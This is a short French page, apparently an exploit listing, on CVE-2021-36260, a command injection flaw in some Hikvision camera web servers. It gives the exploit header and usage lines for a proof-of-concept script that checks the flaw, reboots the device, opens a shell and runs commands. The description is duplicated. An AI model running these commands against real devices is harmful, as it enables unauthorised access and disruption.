
Vulnérabilité d'injection de commandes dans le serveur web de certains produits Hikvision. En raison d'une validation insuffisante des entrées, un attaquant peut exploiter la vulnérabilité pour lancer une attaque par injection de commandes en envoyant des messages contenant des commandes malveillantes.
CVE-2021-36260 POC vulnérabilité d'injection de commandes dans le serveur web de certains produits Hikvision. En raison d'une validation insuffisante des entrées, un attaquant peut exploiter la vulnérabilité pour lancer une attaque par injection de commandes en envoyant des messages contenant des commandes malveillantes.
Exploit Title: Hikvision Web Server Build 210702 - Command Injection
Exploit Author: bashis
Vendor Homepage: https://www.hikvision.com/
Version: 1.0
CVE: CVE-2021-36260
Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
Note:
[Exemples] Vérification de vulnérabilité sécurisée / vérification : $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
Vérification de vulnérabilité sécurisée et non sécurisée / vérification : (utilisera 'unsafe check' uniquement si non vérifié par 'safe check') $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
Vérification de vulnérabilité non sécurisée / vérification : $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
Lancer et se connecter à un shell SSH : $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
Exécuter une commande : $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
Exécuter une commande aveugle : $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"